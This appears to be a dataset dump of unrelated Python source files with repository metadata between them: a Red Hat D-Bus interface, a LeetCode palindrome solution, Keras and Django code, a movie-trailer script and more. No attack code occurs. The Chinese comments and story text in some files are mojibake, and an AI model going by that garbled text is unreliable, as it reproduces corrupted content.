# implied, including the implied warranties of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. You should have received a copy of GPLv2
# along with this software; if not, see
# http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt.
#
# Red Hat trademarks are not licensed under GPLv2. No permission is
# granted to use or replicate Red Hat trademarks that are incorporated
# in this software or its documentation.
#
import dbus
import inspect
import logging
import subscription_manager.injection as inj
log = logging.getLogger('rhsm-app.' + __name__)
class DbusIface(object):
service_name = 'com.redhat.SubscriptionManager'
def __init__(self):
try:
# Only follow names if there is a default main loop
self.has_main_loop = self._get_main_loop() is not None
self.bus = dbus.SystemBus()
validity_obj = self._get_validity_object(self.service_name,
'/EntitlementStatus',
follow_name_owner_changes=self.has_main_loop)
self.validity_iface = dbus.Interface(validity_obj,
dbus_interface='com.redhat.SubscriptionManager.EntitlementStatus')
# Activate methods now that we're connected
# Avoids some messy exception handling if dbus isn't installed
self.update = self._update
except dbus.DBusException, e:
# we can't connect to dbus. it's not running, likely from a minimal
# install. we can't do anything here, so just ignore it.
log.debug("Unable to connect to dbus")
log.exception(e)
def update(self):
pass
def _update(self):
try:
self.validity_iface.update_status(
inj.require(inj.CERT_SORTER).get_status_for_icon(),
ignore_reply=self.has_main_loop)
except dbus.DBusException, e:
# Should be unreachable in the gui
log.debug("Failed to update rhsmd")
log.exception(e)
# RHEL5 doesn't support 'follow_name_owner_changes'
def _get_validity_object(self, *args, **kwargs):
iface_args = inspect.getargspec(self.bus.get_object)[0]
if 'follow_name_owner_changes' not in iface_args and \
'follow_name_owner_changes' in kwargs:
log.debug("installed python-dbus doesn't support 'follow_name_owner_changes'")
del kwargs['follow_name_owner_changes']
return self.bus.get_object(*args, **kwargs)
# RHEL5 doesn't support 'get_default_main_loop'
def _get_main_loop(self):
if not hasattr(dbus, "get_default_main_loop"):
log.debug("installed python-dbus doesn't support 'get_default_main_loop'")
return None
return dbus.get_default_main_loop()
| [
"root@rhel7.dc2.crunchtools.com"
] | root@rhel7.dc2.crunchtools.com |
c2a0cc11bd0494b27bfb02ee4621278f7af8f7e2 | fca84e471f3e8f0fc9d923b81fd8408602029760 | /road_traffic/road_hw_mapping.py | 1b421cf3b91ec5b71ab7cbe36fc691b26ca3d5ea | [] | no_license | bass3m/traffic_notify | 9f156b0011e46f020fb89f18132eedf655ca249e | 264dcc2c6b21fd75af4e37a6a8288d951aeebf6d | refs/heads/master | 2021-01-01T06:26:54.067672 | 2013-05-23T04:26:30 | 2013-05-23T04:26:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 82 | py | # probably want to get this from somewhere ?
hw_map = {"Hw 85" : 12,
}
| [
"bassem@outlook.com"
] | bassem@outlook.com |
4d870a6b6efa673364b7659f1e6da51827500560 | aeb69456c4e6f2238c947ae426d346aad033d598 | /python/5.ๆ้ฟๅๆๅญไธฒ.py | aed9593aa7719e8a3cc58e203e3ff0564025083e | [] | no_license | ElonXie/LeetCode-Practice | f2c345cadce8d60515343ee94f52de5f34477d81 | 7a54fc8f85e3e7f937bb504a8f4c6de6dd7da3e2 | refs/heads/master | 2021-05-16T21:09:11.231951 | 2020-06-21T03:39:12 | 2020-06-21T03:39:12 | 250,470,089 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,450 | py | #
# @lc app=leetcode.cn id=5 lang=python3
#
# [5] ๆ้ฟๅๆๅญไธฒ
#
# https://leetcode-cn.com/problems/longest-palindromic-substring/description/
#
# algorithms
# Medium (29.08%)
# Likes: 1950
# Dislikes: 0
# Total Accepted: 222.4K
# Total Submissions: 762.2K
# Testcase Example: '"babad"'
#
# ็ปๅฎไธไธชๅญ็ฌฆไธฒ s๏ผๆพๅฐ s ไธญๆ้ฟ็ๅๆๅญไธฒใไฝ ๅฏไปฅๅ่ฎพย s ็ๆๅคง้ฟๅบฆไธบ 1000ใ
#
# ็คบไพ 1๏ผ
#
# ่พๅ
ฅ: "babad"
# ่พๅบ: "bab"
# ๆณจๆ: "aba" ไนๆฏไธไธชๆๆ็ญๆกใ
#
#
# ็คบไพ 2๏ผ
#
# ่พๅ
ฅ: "cbbd"
# ่พๅบ: "bb"
#
#
#
# @lc code=start
# class Solution:
# def longestPalindrome(self, s: str) -> str:
# if not s:
# return ''
# # ๆฏไปๅฆๅพ้พๅท
# # 1. dp
# dp = [[False]*len(s) for i in range(len(s))]
# dp[-1][-1] = True
# for i in range(len(s)-2,-1,-1):
# dp[i][i] = True
# dp[i][i+1] = s[i+1]==s[i]
# for j in range(i+2,len(s)):
# dp[i][j] = (dp[i+1][j-1] and s[j]==s[i])
# max_length = -1
# for i in range(len(s)-1,-1,-1):
# for j in range(i,len(s)):
# if dp[i][j]:
# max_index = j
# if max_length<(max_index-i+1):
# max_length = max_index-i+1
# ans = s[i:max_index+1]
# return ans
class Solution:
def longestPalindrome(self, s: str) -> str:
if not s:
return ''
# 2. ็ฎๅ็ฉบ้ด
max_length = 1
ans = s[-1]
# max_index = -1
dp = [False] * len(s)
dp[-1] = True
for i in range(len(s)-2,-1,-1):
# dp[i] = True
max_cur = 0
max_index = i
for j in range(len(s)-1,i+1,-1):
dp[j] = dp[j-1] and (s[i]==s[j])
if dp[j] and (j-i+1>max_cur):
max_cur = j-i+1
max_index = j
if s[i] == s[i+1]:
dp[i+1] = True
if max_cur<2:
# max_index = i+1
max_cur = 2
max_index = i+1
else:
dp[i+1] = False
dp[i] = True
if max_cur>max_length:
ans = s[i:max_index+1]
max_length = max_cur
return ans
# @lc code=end
if __name__ == '__main__':
s = Solution()
s.longestPalindrome("abacab") | [
"sdaxdh@163.com"
] | sdaxdh@163.com |
23f7b483d241fff198b2e52dcceb4f933c06704b | 3cb11b1d88f0ceff0e8e38a414a93e5935887966 | /dedup/distro.py | 6d0cafa807d052882eacd12dec89a25dbe4c8fe8 | [
"WTFPL"
] | permissive | Kahsolt/pic-dedup | 82aaa168f4e2ef4242acb8f5be9ea4d261f4aacc | 91bc2b6e979b57719103b5c62b859311bd37fdd0 | refs/heads/master | 2021-07-11T14:19:04.329014 | 2020-08-14T03:09:14 | 2020-08-14T03:09:14 | 190,917,725 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,527 | py | #!/usr/bin/env python3
import os
import re
import datetime
from . import PACKAGE_PATH
def assemble_distro(fout='dedup_standalone.py'):
_LOCAL_IMPORT_REGEX = re.compile(r'from \..* import .*')
_FILES = [
'__init__.py',
'settings.py',
'models.py',
'imgproc.py',
'utils.py',
'app.py'
]
lines_import, lines_code = set(), list()
for fn in _FILES:
lines_code += ['', '# %s' % fn]
with open(os.path.join(PACKAGE_PATH, fn)) as fp:
lastline = ''
for line in fp.readlines():
line = line.rstrip(' \n\r\t')
if not line and not lastline \
or line.startswith('#!') \
or line.startswith('__all__') \
or _LOCAL_IMPORT_REGEX.findall(line):
continue
elif line.startswith('import') or line.startswith('from'):
lines_import.add(line.lstrip(' \t'))
else:
lines_code.append(line)
lastline = line
with open(fout, 'w+') as fp:
lines = [
'#!/usr/bin/env python3',
'# This file is auto-generated, manual changes should be lost.',
'# build date: %s.' % datetime.datetime.now(),
'',
'__dist__ = "standalone"', # magic sign for detect_env()
'',
] + sorted(list(lines_import)) + lines_code + [
'',
'if __name__ == "__main__":',
' App()'
]
for line in lines:
fp.write(line)
fp.write('\n')
fp.flush()
if __name__ == '__main__':
assemble_distro() | [
"kahsolt@qq.com"
] | kahsolt@qq.com |
eff44ce1869cc6d0c340bdadc54f92b6e8ba7f01 | 817f6b5a69b53599589b798b94efecd8ed1d8e17 | /exercises/1901100282/d07/mymodule/main.py | 2eb3cc635245118bc6dace1675a2ec08d1d02312 | [] | no_license | oneisonly/selfteaching-python-camp | 2422a16c0c9efe787f18fa48833b0bdc8e245982 | 2f26872d31c7392f9530ee1aa7be7958109aaec3 | refs/heads/master | 2020-07-04T23:17:39.750702 | 2019-12-03T04:38:43 | 2019-12-03T04:38:43 | 202,078,442 | 0 | 0 | null | 2019-08-13T06:24:02 | 2019-08-13T06:24:01 | null | UTF-8 | Python | false | false | 3,999 | py | text = '''
ๆๅ
ฌ็งปโผญๅฑฑ
ๅคชโพ่ก๏จ๏ผ็ๅฑโผไบโผญๅฑฑ็ๅ๏ฅฃโพฏ้ข๏ผไฝไบ๏ฆบโผไธๅไนโผๅๆญฒ็โฝผ่๏คด็ฟ๏ผๅๅซๆๅ
ฌใโผไบโผญๅฑฑไฝๅฐๅปฃ้๏ผๆไฝๅป่ทฏ๏คท๏ผไฝฟไป
ๅๅฎถโผไบบๅพไพ๏คญๆฅต็บไธ๏ฅงไพฟ๏ฅฅใ
โผไธๅคฉ๏ผๆๅ
ฌๅฌ้ๅฎถโผไบบ่ชช๏ผใ่ฎๆๅๅ็กๅ
ถโผๅ๏ฆ๏ผๅทๅนณโผไบโผญๅฑฑ๏ผ้ๆข้่ทฏ๏คท๏ผ็ด้่ฑซๅท๏ผไฝ ๅ่ช็บๆ
ๆจฃ๏ผใ
โผคๅคงๅฎถ้ฝ็ฐ๏ฅขโผๅฃๅ่ฒ่ดๆ๏ผๅชๆไป็ๅฆปโผฆๅญ่กจ็คบๆท็๏ผไธฆ่ชช๏ผใไฝ ้ฃ้้ฟโผไธๅโผฉๅฐไธ็โผๅ๏ฆ้๏ฅพ้ฝๆฒๆ๏ผๆ
ๅฏ่ฝๅทๅนณๅคชโพ่ก๏จใ็ๅฑโผไบโผญๅฑฑๅข๏ผๆณไธ๏ผ้ฟๅบ็โผๅโฝฏ็ณโผๅไธๅฐๅช่ฃๅปๅข๏ผใ
โผคๅคงๅฎถ้ฝ็ฑ็๏ฆๅฐ่ชช๏ผใๆโผๅโฝฏ็ณไธ้ฒๆธคๆตท๏ฉ
่ฃใใ
ๆผๆฏๆๅ
ฌๅฐฑๅๅ
ๅญซ๏ผโผไธ่ตท้ๆโผๅ๏ผๆโผๅโฝฏ็ณๆฌ้ๅฐๆธคๆตท๏ฉ
ๅปใ
ๆๅ
ฌ็้ฐๅฑ
ๆฏๅๅฏกๅฉฆ๏ผๆๅๅ
โผฆๅญโผๅ
ซๆญฒไน่่ดๅๅๅฐโพ่ตฐไพ๏คญๅนซๅฟใ
ๅฏไพ๏คญๆๅพ๏ผไปๅ่ฆโผไธๅนด๏ฆๆ่ฝๅพ่ฟๆธคๆตท๏ฉ
โผไธๆฌกใ
ไฝๅจโฟ้ปๆฒณๆฒณ็็ๆบๅ๏ผ็โพ่ฆ๏จไปๅ้ๆจฃโพ่พ่ฆ๏ผๅ็ฌๆๅ
ฌ่ชช๏ผใไฝ ไธ๏ฅงๆฏๅพๆ่ ขๅ๏ผไฝ ๅทฒโผไธๆๅนด๏ฆ็ด
ไบ๏ฆบ๏ผๅฐฑๆฏโฝค็จ็กไฝ ็ๆฐฃโผๅ๏ฆ๏ผไนไธ๏ฅง่ฝๆๅปโผญๅฑฑ็โผไธโป่งๅข๏ผใ
ๆๅ
ฌๆญๆฏ้๏ผใไฝ ๆ้ๆจฃ็ๆโพ่ฆ๏จ๏ผๆฏไธ๏ฅงๆๆโฝฉ็ฝ็ใไฝ โฝๆฏ้ฃๅฏกๅฉฆ็โผฉๅฐๅ
โผฆๅญ้ไธ๏ฅงๅฆๅข๏ผๅฐฑ็ฎๆๆญป
ไบ๏ฆบ๏ผ้ๆๆ็ๅ
โผฆๅญ๏ผๆ็ๅญซโผฆๅญ๏ผๆ็ๆพๅญซโผฆๅญ๏ผไปๅโผไธ็ดๅณไธๅปใโฝฝ่้โผไบโผญๅฑฑๆฏไธ๏ฅงๆๅ โผคๅคง็๏ผ็ธฝๆ
โผไธๅคฉ๏ผๆๅๆๆๅฎๅๅทๅนณใใ
ๆบๅ่ฝไบ๏ฆบ๏ผ็ก่ฉฑๅฏ่ชช๏ผ
โผไบโผญๅฑฑ็ๅฎ่ญท็ฅ่ขซๆๅ
ฌ็ๅ
ๆฏ
็ฒพ็ฅๅๅ๏ผไพฟ๏ฅฅๆๆญคไบๅฅ็ฅๅคฉๅธใๅคฉๅธไฝฉๆๆๅ
ฌ็็ฒพ็ฅ๏ผๅฐฑๅฝๅ
ฉไฝโผคๅคง
โผๅ๏ฆ็ฅๆนโพ่ตฐโผไบโผญๅฑฑใ
How The Foolish Old Man Moved Mountains
Yugong was a ninety-year-old man who lived at the north of two high
mountains, Mount Taixing and Mount Wangwu.
Stretching over a wide expanse of land, the mountains blocked
yugongโs way making it inconvenient for him and his family to get
around.
One day yugong gathered his family together and said,โLetโs do our
best to level these two mountains. We shall open a road that leads
to Yuzhou. What do you think?โ
All but his wife agreed with him.
โYou donโt have the strength to cut even a small mound,โ muttered
his wife. โHow on earth do you suppose you can level Mount Taixin
and Mount Wanwu? Moreover, where will all the earth and rubble go?โ
โDump them into the Sea of Bohai!โ said everyone.
So Yugong, his sons, and his grandsons started to break up rocks and
remove the earth. They transported the earth and rubble to the Sea
of Bohai.
Now Yugongโs neighbour was a widow who had an only child eight years
old. Evening the young boy offered his help eagerly.
Summer went by and winter came. It took Yugong and his crew a full
year to travel back and forth once.
On the bank of the Yellow River dwelled an old man much respected
for his wisdom. When he saw their back-breaking labour, he ridiculed
Yugong saying,โArenโt you foolish, my friend? You are very old now,
and with whatever remains of your waning strength, you wonโt be able
to remove even a corner of the mountain.โ
Yugong uttered a sigh and said,โA biased person like you will never
understand. You canโt even compare with the widowโs little boy!โ
โEven if I were dead, there will still be my children, my
grandchildren, my great grandchildren, my great great grandchildren.
They descendants will go on forever. But these mountains will not
grow any taler. We shall level them one day!โ he declared with
confidence.
The wise old man was totally silenced.
When the guardian gods of the mountains saw how determined Yugong
and his crew were, they were struck with fear and reported the
incident to the Emperor of Heavens.
Filled with admiration for Yugong, the Emperor of Heavens ordered
two mighty gods to carry the mountains away.
'''
import stats_word
stats_word.stats_word(text)
| [
"43633521+liujiayi0042@users.noreply.github.com"
] | 43633521+liujiayi0042@users.noreply.github.com |
aae01e5ea480127d1b556c6aea6273ee7d32d993 | cccf8da8d41ae2c14f5f4313c1edcf03a27956bb | /python/python2latex/writeLTXtextnormal.py | 2f9ea1c10c926e3827f58c7bf4835b22cb57fa58 | [] | no_license | LucaDiStasio/transpilers | e8f8ac4d99be3b42a050148ca8fbc5d025b83290 | c55d4f5240083ffd512f76cd1d39cff1016909b8 | refs/heads/master | 2021-01-12T01:57:00.540331 | 2017-11-01T13:59:55 | 2017-11-01T13:59:55 | 78,448,378 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,293 | py | # Autogenerated with SMOP
from smop.core import *
#
@function
def writeLTXtextnormal(filepath=None,args=None,options=None,*args,**kwargs):
varargin = writeLTXtextnormal.varargin
nargin = writeLTXtextnormal.nargin
##
#==============================================================================
# Copyright (c) 2016-2017 Universite de Lorraine & Lulea tekniska universitet
# Author: Luca Di Stasio <luca.distasio@gmail.com>
# <luca.distasio@ingpec.eu>
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the distribution
# Neither the name of the Universite de Lorraine or Lulea tekniska universitet
# nor the names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#==============================================================================
# DESCRIPTION
#
# A function to create a Latex file.
# Sets normal font. SeeText Formatting.#
##
fileId=fopen(filepath,'a')
fprintf(fileId,'\\n')
line='\\textnormal'
if logical_not(strcmp(options,'none')) and logical_not(strcmp(options,'NONE')) and logical_not(strcmp(options,'None')):
line=strcat(line,'[',options,']')
if logical_not(isempty(args)):
line=strcat(line,'{')
for i in arange(1,length(args)).reshape(-1):
dims=size(args)
if dims[1] == 1 and dims[2] == 1:
line=strcat(line,args[i])
else:
if dims[1] > 1 and dims[2] == 1:
try:
line=strcat(line,args[i][1])
finally:
pass
else:
if dims[1] == 1 and dims[2] > 1:
try:
line=strcat(line,args[1][i])
finally:
pass
else:
line=strcat(line,args[i])
line=strcat(line,'}')
fprintf(fileId,strcat(line,'\\n'))
fclose(fileId)
return | [
"luca.distasio@gmail.com"
] | luca.distasio@gmail.com |
497a0d17e9b80f2eb4684371052158d5097cd94c | 95e4aa7ea67d37c38e521a46d1165a36516338c1 | /data.py | 2e1ac2b545eba7ce84963d97ece829f80d736152 | [] | no_license | ZeyuGaoAi/nucleiSegmentation | e7d0e97fce0b9fa8fd33d1ae2534595bc4afaa37 | c44362a5593d33f99d2a95105c2eecb1a44a3d3f | refs/heads/master | 2020-06-26T14:56:12.548876 | 2019-07-30T14:21:23 | 2019-07-30T14:22:07 | 199,663,940 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,630 | py | from __future__ import print_function
from keras.preprocessing.image import ImageDataGenerator
import numpy as np
import os
import glob
import cv2
import skimage.io as io
import skimage.color as color
import skimage.transform as trans
Sky = [128,128,128]
Building = [128,0,0]
Pole = [192,192,128]
Road = [128,64,128]
Pavement = [60,40,222]
Tree = [128,128,0]
SignSymbol = [192,128,128]
Fence = [64,64,128]
Car = [64,0,128]
Pedestrian = [64,64,0]
Bicyclist = [0,128,192]
Unlabelled = [0,0,0]
COLOR_DICT = np.array([Sky, Building, Pole, Road, Pavement,
Tree, SignSymbol, Fence, Car, Pedestrian, Bicyclist, Unlabelled])
def adjustData(img,mask,flag_multi_class,num_class):
if(flag_multi_class):
img = img / 255
mask = mask[:,:,:,0] if(len(mask.shape) == 4) else mask[:,:,0]
new_mask = np.zeros(mask.shape + (num_class,))
for i in range(num_class):
#for one pixel in the image, find the class in mask and convert it into one-hot vector
#index = np.where(mask == i)
#index_mask = (index[0],index[1],index[2],np.zeros(len(index[0]),dtype = np.int64) + i) if (len(mask.shape) == 4) else (index[0],index[1],np.zeros(len(index[0]),dtype = np.int64) + i)
#new_mask[index_mask] = 1
new_mask[mask == i,i] = 1
new_mask = np.reshape(new_mask,(new_mask.shape[0],new_mask.shape[1]*new_mask.shape[2],new_mask.shape[3])) if flag_multi_class else np.reshape(new_mask,(new_mask.shape[0]*new_mask.shape[1],new_mask.shape[2]))
mask = new_mask
elif(np.max(img) > 1):
img = img / 255
mask = mask /255
mask[mask > 0.5] = 1
mask[mask <= 0.5] = 0
return (img,mask)
def trainGenerator(batch_size,train_path,image_folder,mask_folder,aug_dict,image_color_mode = "grayscale",
mask_color_mode = "grayscale",image_save_prefix = "image",mask_save_prefix = "mask",
flag_multi_class = False,num_class = 2,save_to_dir = None,target_size = (512,512),seed = 1):
'''
can generate image and mask at the same time
use the same seed for image_datagen and mask_datagen to ensure the transformation for image and mask is the same
if you want to visualize the results of generator, set save_to_dir = "your path"
'''
image_datagen = ImageDataGenerator(**aug_dict)
mask_datagen = ImageDataGenerator(**aug_dict)
image_generator = image_datagen.flow_from_directory(
train_path,
classes = [image_folder],
class_mode = None,
color_mode = image_color_mode,
target_size = target_size,
batch_size = batch_size,
save_to_dir = save_to_dir,
save_prefix = image_save_prefix,
seed = seed)
mask_generator = mask_datagen.flow_from_directory(
train_path,
classes = [mask_folder],
class_mode = None,
color_mode = mask_color_mode,
target_size = target_size,
batch_size = batch_size,
save_to_dir = save_to_dir,
save_prefix = mask_save_prefix,
seed = seed)
train_generator = zip(image_generator, mask_generator)
for (img,mask) in train_generator:
img,mask = adjustData(img,mask,flag_multi_class,num_class)
yield (img,mask)
def testGenerator(test_path,num_image = 30,target_size = (512,512),flag_multi_class = False,as_gray = True):
for i in range(num_image):
img = io.imread(os.path.join(test_path,"%d.png"%i),as_gray = as_gray)
if not as_gray:
img = img[:,:,:3]
img = img / 255
img = trans.resize(img,target_size)
img = np.reshape(img,img.shape) if (not flag_multi_class) else img
img = np.reshape(img,(1,)+img.shape)
yield img
def geneTrainNpy(image_path,mask_path,flag_multi_class = False,num_class = 2,image_prefix = "image",mask_prefix = "mask",image_as_gray = True,mask_as_gray = True):
image_name_arr = glob.glob(os.path.join(image_path,"%s*.png"%image_prefix))
image_arr = []
mask_arr = []
for index,item in enumerate(image_name_arr):
img = io.imread(item,as_gray = image_as_gray)
img = np.reshape(img,img.shape + (1,)) if image_as_gray else img
mask = io.imread(item.replace(image_path,mask_path).replace(image_prefix,mask_prefix),as_gray = mask_as_gray)
mask = np.reshape(mask,mask.shape + (1,)) if mask_as_gray else mask
img,mask = adjustData(img,mask,flag_multi_class,num_class)
image_arr.append(img)
mask_arr.append(mask)
image_arr = np.array(image_arr)
mask_arr = np.array(mask_arr)
return image_arr,mask_arr
def labelVisualize(num_class,color_dict,img):
img = img[:,:,0] if len(img.shape) == 3 else img
img_out = np.zeros(img.shape + (3,))
for i in range(num_class):
img_out[img == i,:] = color_dict[i]
return img_out / 255
def saveResult(save_path, npyfile, flag_multi_class = False, num_class = 2):
for index,item in enumerate(npyfile):
img = labelVisualize(num_class,COLOR_DICT,item) if flag_multi_class else item[:,:,0]
labels = np.zeros_like(img)
for i in range(img.shape[0]):
for j in range(img.shape[1]):
if(img[i,j]<0.4):
labels[i,j]=2
elif(img[i,j]<0.75):
labels[i,j]=1
else:
labels[i,j]=0
dst=color.label2rgb(labels)
img = img*255
io.imsave(os.path.join(save_path,"%d_predict_prob.png"%index), img)
io.imsave(os.path.join(save_path,"%d_predict_label.png"%index), dst)
| [
"betpotti@gmail.com"
] | betpotti@gmail.com |
72009cd6fc5d27df6efcc011b7e639c8b38c1167 | 021fe11ddc9f28b39bbe5a0d23bffff6ff0f734d | /entertainment.py | 0eaa8925b76eb740f1efa873e22ba6f4131db443 | [] | no_license | AnnieLincy/fresh_tomatoes_movie_trailer_website | 6f70f4608ad0efc496b70ecaacf74e477f21d34a | f13bea6858defd7a863239e10f655413945397fe | refs/heads/master | 2021-06-30T17:56:47.844971 | 2017-09-14T04:28:54 | 2017-09-14T04:28:54 | 103,485,755 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,097 | py |
import fresh_tomatoes
import media
the_boss_baby=media.Movie("THE BOSS BABY","A matured small baby",
"https://upload.wikimedia.org/wikipedia/en/0/0e/The_Boss_Baby_poster.jpg",
"https://www.youtube.com/watch?v=O2Bsw3lrhvs")
bfg = media.Movie("The big friendly giant.",
"An orphan human girl befriends a benevolent giant",
"https://upload.wikimedia.org/wikipedia/en/a/af/The_BFG_poster.jpg",
"https://www.youtube.com/watch?v=VG5MtenlP-A")
#print(bfg.storyline)
#print(the_boss_baby.storyline)
#bfg.show.trailer()
bahubali2 = media.Movie("Bahubali 2",
"Kattappa continues to narrate how he ended up killing Amarendra Baahubali",
"https://upload.wikimedia.org/wikipedia/en/f/f9/Baahubali_the_Conclusion.jpg",
"https://www.youtube.com/watch?v=sOEg_YZQsTI")
ramona_and_beezus = media.Movie("Ramona and Beezus",
"Story of 2 sisters.",
"https://upload.wikimedia.org/wikipedia/en/9/90/Ramona_and_Beezus_Poster.jpg",
"https://www.youtube.com/watch?v=qjW2gNQBajs")
ghazi_attack = media.Movie("The Ghazi attack",
"The film based on the mysterious sinking of PNS Ghazi during Indo-Pakistani War of 1971.",
"https://upload.wikimedia.org/wikipedia/en/e/e7/The_Ghazi_Attack_Poster.jpg",
"https://www.youtube.com/watch?v=Xn2qOnKuOoc")
fast_and_furious = media.Movie("Fast and Furious",
"The Fast and the Furious is an American franchise based on a series of action films",
"https://upload.wikimedia.org/wikipedia/en/5/54/Fast_and_the_furious_poster.jpg",
"https://www.youtube.com/watch?v=ZsJz2TJAPjw")
movies = [the_boss_baby,bfg,bahubali2,ramona_and_beezus,ghazi_attack,fast_and_furious]
fresh_tomatoes.open_movies_page(movies)
| [
"noreply@github.com"
] | AnnieLincy.noreply@github.com |
a82cba3b032d7fae58e9cd2b2e97411d36c3d640 | f72f95cce172b5b06ebd41956510cf53238e29ea | /snippets/urls.py | 89d8a4c20aa7410a628948711d6d4f094f5766d1 | [] | no_license | sritambehera/snippets | d3d9a1f18645206faf4c676ccdb35f927eedcb8a | 295d14c95a9b2126cf3d8625c57565c043cfd9ab | refs/heads/master | 2022-12-11T04:09:16.103825 | 2019-09-20T11:02:55 | 2019-09-23T19:14:05 | 206,324,529 | 0 | 0 | null | 2022-12-08T06:07:16 | 2019-09-04T13:22:09 | Python | UTF-8 | Python | false | false | 1,125 | py | from django.urls import path, include
from rest_framework.routers import DefaultRouter
from snippets import views
router = DefaultRouter()
router.register(r'snippets', views.SnippetViewSet)
router.register(r'users', views.UserViewSet)
urlpatterns = [
path('', include(router.urls)),
]
'''
snippet_list = SnippetViewSet.as_view({'get': 'list', 'post': 'create'})
snippet_detail = SnippetViewSet.as_view({'get': 'retrieve', 'put': 'update','patch':'partial_update', 'delete': 'destroy'})
snippet_highlight = SnippetViewSet.as_view({'get': 'highlight'}, renderer_classes = [renderers.StaticHTMLRenderer])
user_list = UserViewSet.as_view({'get': 'list'})
user_detail = UserViewSet.as_view({'get': 'retrieve'})
urlpatterns = format_suffix_patterns([
path('', api_root),
path('snippets/', snippet_list, name = 'snippet-list'),
path('snippets/<int:pk>/',snippet_detail, name = 'snippet-detail'),
path('users/', user_list , name = 'user-list'),
path('users/<int:pk>',user_detail, name = 'user-detail'),
path('snippets/<int:pk>/highlight/',snippet_highlight, name = 'snippet-highlight'),
])
''' | [
"sritambehera110@gmail.com"
] | sritambehera110@gmail.com |
37e3a4cc222163f516595fe6e5f1b28d7b5ed921 | 41309eae711707844b715a7149dc450c98bea1ce | /clubadmin/shared/dialogs/Image.py | f42aa211a0f5f0bae5afa74b8ff070511ac948a9 | [
"MIT"
] | permissive | rpmoseley/clubadmin | 57f56a8cf1a7de1908a9fd47ca42d03a1c161dac | 35d0094ea5e97e8478ca021ab8e422cebbc26263 | refs/heads/master | 2021-05-12T15:49:16.646847 | 2018-01-12T17:40:46 | 2018-01-12T17:40:46 | 116,993,790 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 353 | py | '''
This module provides the customised Image class
'''
import wx
class Image(wx.Image):
'''Provide an overloaded variant of the Image to add the support of labels'''
def __init__(self, *args, **kwds):
label = kwds.pop('label', None)
wx.Image.__init__(self, *args, **kwds)
if label is not None:
self.label = wx.StaticText(label)
| [
"richard.moseley4@gmail.com"
] | richard.moseley4@gmail.com |
faf28195ec1f792c63f3bb9a91057cbee700d198 | 63c0b4d830d79ea11e48915fd192da7c888f5402 | /44.py | 55e53c74c52b589a1093b8bb6ed211087e68c613 | [] | no_license | sejje/sejje-euler | f9127a98f1860ce9c22f35ce2574263fc2ede762 | 2737b5bd93ef017c28c3ff1d2f498ef006302d5e | refs/heads/master | 2016-09-10T18:43:04.577965 | 2012-10-15T17:49:18 | 2012-10-15T17:49:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 376 | py | import math
def pentagonal(n):
return n * (3 * n - 1) / 2
def is_pentagonal(n):
# if X is a natural number, return True
x = ((math.sqrt(24 * n + 1) + 1) / 6)
return int(x) == x
for i in xrange(1, 9999999):
if is_pentagonal(i):
for x in xrange(1, i):
if is_pentagonal(x):
if is_pentagonal(i - x):
if is_pentagonal(i + x):
print i, x, abs(i - x)
| [
"jesse.briggs@gmail.com"
] | jesse.briggs@gmail.com |
4a60de6be31da7bf31c87e44c1819edbb0b124a0 | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_040/ch20_2020_03_05_18_36_09_760355.py | f61391c93f57ceb3a39f6885c928eb85d74c21f9 | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 182 | py | distancia=float(input("Qual distรขncia vocรช deseja percorrer: "))
if (distancia<=200):
print ("R$",(distancia:.2f*0.5))
else:
print ("R$",(200*0.5+(distancia:.2f-200)*0.45)) | [
"you@example.com"
] | you@example.com |
e64f4820312395912aa140973da3066ee6abffb6 | 96a76aee885037023ab37e1e5f0ef076c0740bac | /proofs_aggreg.py | b12d3ae70e9ef66cb82499d67592b0d070f2626f | [
"MIT"
] | permissive | rrtoledo/panic | 361cdbb7823cd5ee6232ee650884c8af9c1bc050 | 1218ca1aa777b28c1a53143694c98a7f728134e1 | refs/heads/master | 2022-11-20T19:50:20.872767 | 2020-07-24T19:11:53 | 2020-07-24T19:11:53 | 282,295,078 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 23,988 | py | from bplib.bp import G1Elem
from bplib.bp import G2Elem
from bplib.bp import GTElem
from petlib.bn import Bn
from gsproof import GSProof
from bsps import BSPS
from usps import USPS
from cca2_cs import CSEnc
